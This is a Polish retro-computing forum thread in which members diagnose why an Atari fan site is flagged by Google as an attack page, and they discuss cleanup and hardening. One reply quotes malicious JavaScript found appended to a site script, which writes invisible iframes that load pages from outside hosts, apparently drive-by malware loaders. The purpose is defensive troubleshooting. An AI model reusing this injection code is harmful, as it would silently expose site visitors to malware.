• Monsoft
  • Starszy Atarowiec
  • Nieaktywny
  • Skąd: Royal Ascot
  • Zarejestrowany: 2002-08-15
  • Posty: 2,239

Temat: www.dereatari.republika.pl - repoeted attack page

Czy tylko w moim firefoxie czy u Was takze, strona Jer'a zostala zatagowana jako Attack page ? Znow cos google namieszalo

Jer,

"If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center."

Czyli zaloguj sie do Goole Webmaster Tools strony i zobacz dlaczego.

Ostatnio edytowany przez Monsoft (2013-02-14 10:36:43)

2 Odpowiedź przez Sikor

  • Sikor
  • Naddyskownik
  • Nieaktywny
  • Skąd: Warszawa
  • Zarejestrowany: 2002-06-17
  • Posty: 11,103

Odp: www.dereatari.republika.pl - repoeted attack page

Też:/

google_w_pudle napisał/a:

Bezpieczne przeglądanie
Strona diagnostyczna witryny dereatari.republika.pl

Jaki jest obecny stan bezpieczeństwa witryny dereatari.republika.pl?

    Witryna została uznana za podejrzaną – jej odwiedzanie może stanowić zagrożenie dla komputera.

    W ciągu ostatnich 90 dni część tej witryny została odnotowana z uwagi na podejrzane działania następującą liczbę razy: 1.

Co się stało podczas odwiedzin tej witryny przez Google?

    W ciągu ostatnich 90 dni przetestowaliśmy w tej witrynie następującą liczbę stron: 1. Wyświetlanie 1 z nich spowodowało pobranie i zainstalowanie złośliwego oprogramowania bez zgody użytkownika. Witryna ta po raz ostatni była odwiedzana przez Google 2012-12-21, a po raz ostatni znaleziono w niej podejrzane treści 2012-12-21.

    Ta witryna działała w następującej liczbie sieci: 1, m.in. AS12990 (ONET).

Czy ta witryna pośredniczyła w rozpowszechnianiu złośliwego oprogramowania?

    Nie wydaje się, aby w ciągu ostatnich 90 dni witryna dereatari.republika.pl pośredniczyła w zarażaniu jakichkolwiek witryn.

Czy w tej witrynie działało złośliwe oprogramowanie?

    Nie, w ciągu ostatnich 90 dni nie było w tej witrynie złośliwego oprogramowania.

Jak do tego doszło?

    W pewnych przypadkach osoby trzecie mogą dodawać do legalnych witryn złośliwy kod, który spowoduje wyświetlanie przez nas komunikatu ostrzegawczego.

Dalsze czynności:

    Wróć do poprzedniej strony.
    Jeśli witryna należy do Ciebie, możesz zwrócić się o sprawdzenie jej za pomocą Narzędzi Google dla webmasterów. Więcej informacji na temat procesu sprawdzania można znaleźć w Centrum pomocy Google dla webmasterów.

Sikor umarł...

Sikor's Strona

3 Odpowiedź przez jer

  • jer
  • Starszy Atarowiec
  • Nieaktywny
  • Skąd: Twierdza Modlin
  • Zarejestrowany: 2004-07-27
  • Posty: 2,436

Odp: www.dereatari.republika.pl - repoeted attack page

Już było o tym w grudniu. Skasowałem konto, sprawdziłem pliki u siebie odrdzewiaczem i założyłem konto od nowa na onecie. Teraz znów się to pojawiło. Admini na onecie mają to w dupie, a to ich serwer, widać słabo zabezpieczony, bo wiele stron jest zakażonych. Jak tylko połączę się z serwerem zaraz mam trojana, komp się muli i robę pełny skan antywirusem, trojany usuwam i wszystko działa OK.

Moje www

jer's Strona

4 Odpowiedź przez willy

  • willy
  • Atarowiec
  • Nieaktywny
  • Skąd: $E477.dk
  • Zarejestrowany: 2013-01-04
  • Posty: 1,953

Odp: www.dereatari.republika.pl - repoeted attack page

Problemy najprawdopodobniej stwarza to:

W pliku /skrypty/m-x.js

Na końcu doklejony jest taki kod:

document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://gclabrelscon.net/about.php"></iframe></div>');


document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.mc-plainlinde.at/upload/upload.php"></iframe></div>');

Albo masz gdziś dziurę w którymś skrypcie php (upload jakiś), albo server dziurawy i przez powłokę coś się uruchamia, nie koniecznie na twoim koncie.

"tatusiu zobacz, narysowałam tobie takie same coś jak na twojej koszulce" 
https://github.com/willyvmm/mouSTer
jmp $e477

willy's Strona

5 Odpowiedź przez gorgh

  • gorgh
  • Młodszy Atarowiec
  • Nieaktywny
  • Skąd: Wyszków
  • Zarejestrowany: 2008-02-25
  • Posty: 990

Odp: www.dereatari.republika.pl - repoeted attack page

co ciekawe niektore watki na aa tez czasem pojawiaja sie jako niebezpieczne, np ten, antywirus sygnalizuje mi iFrame

moja strona o grach retro
mój blog osobisty

gorgh's Strona

6 Odpowiedź przez jer

  • jer
  • Starszy Atarowiec
  • Nieaktywny
  • Skąd: Twierdza Modlin
  • Zarejestrowany: 2004-07-27
  • Posty: 2,436

Odp: www.dereatari.republika.pl - repoeted attack page

To też usuwałem, pojawia się znowu jak widać.
Musiał bym wrzucić jakiśprogramik wykrywający np. "opacity" i robiący miszmasz przypadkowo zamieniając litery w tym słówku, ale jestem za krótki w tym.

Ostatnio edytowany przez jer (2013-02-14 20:13:03)

Moje www

jer's Strona

7 Odpowiedź przez willy

  • willy
  • Atarowiec
  • Nieaktywny
  • Skąd: $E477.dk
  • Zarejestrowany: 2013-01-04
  • Posty: 1,953

Odp: www.dereatari.republika.pl - repoeted attack page

uruchom taki skrypt na serverze w głównym katalogu.

<?php
print_r (shell_exec('cd ..;ls')
?>

Jak się wykona i poda katalogi nadrzędne to jest na 95% wina servera.

"tatusiu zobacz, narysowałam tobie takie same coś jak na twojej koszulce" 
https://github.com/willyvmm/mouSTer
jmp $e477

willy's Strona

8 Odpowiedź przez wieczor

  • Skąd: Gdańsk
  • Zarejestrowany: 2007-10-21
  • Posty: 4,404

Odp: www.dereatari.republika.pl - repoeted attack page

Jeszcze jedna rzecz - jesli masz mozliwosc ustawiania uprawnien do plikow przez FTP ustaw je read only (naturalnie poza tymi gdzie strona ma zapisywac). Wiele serwerow udostepnia obok POST i GET metode PUT za pomoca ktorej mozna uploadowac pliki na serwer, oczywiscie jest sa prawa do zapisu. Tak najczesciej doklejaja sie te gowna - najczesciej do plikow .js.

Drugie miejsce gdzie lubia sie doklejac, to zarazony komp programisty, ktory je w takiej juz formie sam uploaduje na serwer :))

The problem is not the problem; the problem is your attitude about the problem